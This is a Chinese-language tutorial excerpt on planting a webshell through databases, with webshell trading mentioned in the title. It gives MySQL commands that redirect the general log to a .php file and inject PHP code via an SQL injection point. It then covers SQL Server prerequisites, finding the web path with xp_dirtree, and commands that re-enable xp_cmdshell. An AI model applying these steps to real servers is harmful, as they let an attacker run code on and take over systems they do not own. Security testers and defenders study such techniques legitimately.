三大数据库如何写入WebShell？，webshell交易

将log日志开启，并设置日志的写入位置：

Set globalgeneral＿log ＝ on；

Set globalgeneral＿log＿file ＝ ‘F：／test．php’；

图7：设置日志写入位置

（2）使用写入日志再读取的方法

直接在SQL注入点，使用查询语句，添加WebShell代码，如下：

Select ＇＜？phpphpinfo（）；？＞＇；

此时这段WebShell代码已经被记录到日志文件中了，接下就可以使用连接工具进行连接了。

图8：使用写入日志再读取的方法

SqlServer写入WebShell

01必备条件

① 有相应的权限db＿owner

② 获得Web目录的绝对路径

02写入方法

向MSSQL写入WebShell的方法一共有种：利用xp＿cmdshell命令、差异备份写入shell、log备份写入shell。

03使用XP＿cmdshell写入Webshell

（1）实验前准备：

首先我们需要查找网站目录的绝对路径，查找绝对路径的方法有5种：

通过报错信息查找；

通过目录爆破猜解；

通过旁站的目录确定；

通过存储过程来搜索；

通过读取配置文件查找。

其中通过存储过程来搜索，SQLServer提供了两种方法：xp＿cmdshell和xp＿dirtree

execute master．．xp＿dirtree ‘c：’； 可以查出所有c：下的文件、目录、子目录。

图9：查找网站目录的绝对路径

在真实环境中时，我们执行execute可能并不能得到回显信息，但我们可以在注入点处新建一张表，然后将xp＿dirtree查询到的信息插入其中，再查询这张表即可得相应的绝对路径了。

Xp＿cmdshell是一个更为有效的查询绝对路径的函数，但是目前已经被SQLServer默认关闭了，但我们可以使用如下命令启用这个选项。

EXEC sp＿configure ＇show advanced options＇，1；／／允许修改高级参数RECONFIGURE；

EXEC sp＿configure ＇xp＿cmdshell＇，1； ／／打开xp＿cmdshell扩展RECONFIGURE；－－

图10：打开xp＿cmdshell扩展